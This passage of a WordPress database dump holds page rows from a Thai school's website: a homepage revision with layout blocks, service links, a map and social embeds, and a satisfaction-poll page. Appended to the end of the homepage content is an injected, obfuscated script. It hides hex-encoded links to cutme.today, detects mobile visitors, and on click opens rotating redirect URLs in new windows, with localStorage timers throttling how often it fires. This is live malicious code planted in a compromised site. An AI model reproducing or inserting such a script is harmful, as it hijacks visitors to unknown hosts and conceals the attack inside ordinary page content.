class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_bd7bab-81\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_a02c00-db\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_a02c00-db\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/tabs {\"uniqueID\":\"14_8cac31-6c\",\"tabCount\":2,\"contentBgColor\":\"rgba(171,184,195,0.02)\",\"contentBorderStyles\":[{\"top\":[\"#bcbcbc\",\"\",1],\"right\":[\"#bcbcbc\",\"\",1],\"bottom\":[\"#bcbcbc\",\"\",1],\"left\":[\"#bcbcbc\",\"\",1],\"unit\":\"px\"}],\"tabAlignment\":\"center\",\"titles\":[{\"text\":\"E-SERVICE\",\"icon\":\"fe_box\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"เมนูระบบบริการ\",\"icon\":\"fe_airplay\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#000000\",\"titleColorHover\":\"#f78da7\",\"titleColorActive\":\"#ff6900\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"titleBgHover\":\"#ffffff\",\"titleBgActive\":\"#ffffff\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#8ed1fc\",\"titleBorderActive\":\"#8ed1fc\",\"titleBorderWidth\":[1,1,0,1],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,-1,0],\"size\":\"1.299\",\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"widthType\":\"percent\",\"tabWidth\":[3,\"\",\"\"],\"gutter\":[0,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id14_8cac31-6c kt-tabs-has-2-tabs kt-active-tab-1 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-center \"><ul class=\"kt-tabs-title-list kb-tabs-list-columns kb-tab-title-columns-3\"><li id=\"tab-e-service\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-e-service\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_box\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-SERVICE</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_airplay\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">เมนูระบบบริการ</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"48d9e9-20\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab48d9e9-20\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":723,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=700\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย.png\" alt=\"\" class=\"wp-image-723\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":724,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด.png\" alt=\"\" class=\"wp-image-724\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":725,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม.png\" alt=\"\" class=\"wp-image-725\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"6fe435-37\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab6fe435-37\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":726,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://slp.ssk.in.th/slweb/\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/SLIP-SSK-1.webp\" alt=\"\" class=\"wp-image-726\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":729,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=748\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-1.png\" alt=\"\" class=\"wp-image-729\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":808,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=810\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือ.png\" alt=\"\" class=\"wp-image-808\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":727,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/smss/index.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/smss-ssk1.webp\" alt=\"\" class=\"wp-image-727\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":730,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/5.png\" alt=\"\" class=\"wp-image-730\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":728,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/admss.webp\" alt=\"\" class=\"wp-image-728\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":731,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/6.png\" alt=\"\" class=\"wp-image-731\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:loginout /--></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:image {\"id\":686,\"width\":\"auto\",\"height\":\"500px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\" style=\"aspect-ratio:1;object-fit:cover;width:auto;height:500px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2025-07-01 10:52:26','2025-07-01 03:52:26','',14,'http://pakhaeng.ssk.in.th/?p=1526',0,'revision','',0),
(1527,1,'2025-07-01 10:53:42','2025-07-01 03:53:42','<!-- wp:image {\"id\":1524,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/ประเมิน-1024x353-1-1.jpg\" alt=\"\" class=\"wp-image-1524\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:shortcode -->\n[forminator_poll id=\"1516\"]\n<!-- /wp:shortcode -->','ประเมินความพึงพอใจในการรับบริการ','','inherit','closed','closed','','1523-revision-v1','','','2025-07-01 10:53:42','2025-07-01 03:53:42','',1523,'http://pakhaeng.ssk.in.th/?p=1527',0,'revision','',0),
(1528,1,'2025-07-01 11:31:35','2025-07-01 04:31:35','','%e0%b9%81%e0%b8%9a%e0%b8%9a%e0%b8%aa%e0%b8%ad%e0%b8%9a%e0%b8%96%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%9e%e0%b8%b6%e0%b8%87%e0%b8%9e%e0%b8%ad%e0%b9%83%e0%b8%88-%e0%b9%84%e0%b8%a1','','publish','closed','closed','','%e0%b9%81%e0%b8%9a%e0%b8%9a%e0%b8%aa%e0%b8%ad%e0%b8%9a%e0%b8%96%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%9e%e0%b8%b6%e0%b8%87%e0%b8%9e%e0%b8%ad%e0%b9%83%e0%b8%88-%e0%b9%84%e0%b8%a1','','','2025-07-01 11:49:34','2025-07-01 04:49:34','',0,'http://pakhaeng.ssk.in.th/?post_type=forminator_quizzes&#038;p=1528',0,'forminator_quizzes','',0),
(1529,1,'2025-07-01 11:51:24','2025-07-01 04:51:24','<!-- wp:image {\"id\":1524,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/ประเมิน-1024x353-1-1.jpg\" alt=\"\" class=\"wp-image-1524\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:shortcode -->\n[forminator_poll id=\"1516\"]\n<!-- /wp:shortcode -->','ประเมินความพึงพอใจในการรับบริการ','','inherit','closed','closed','','1523-revision-v1','','','2025-07-01 11:51:24','2025-07-01 04:51:24','',1523,'http://pakhaeng.ssk.in.th/?p=1529',0,'revision','',0),
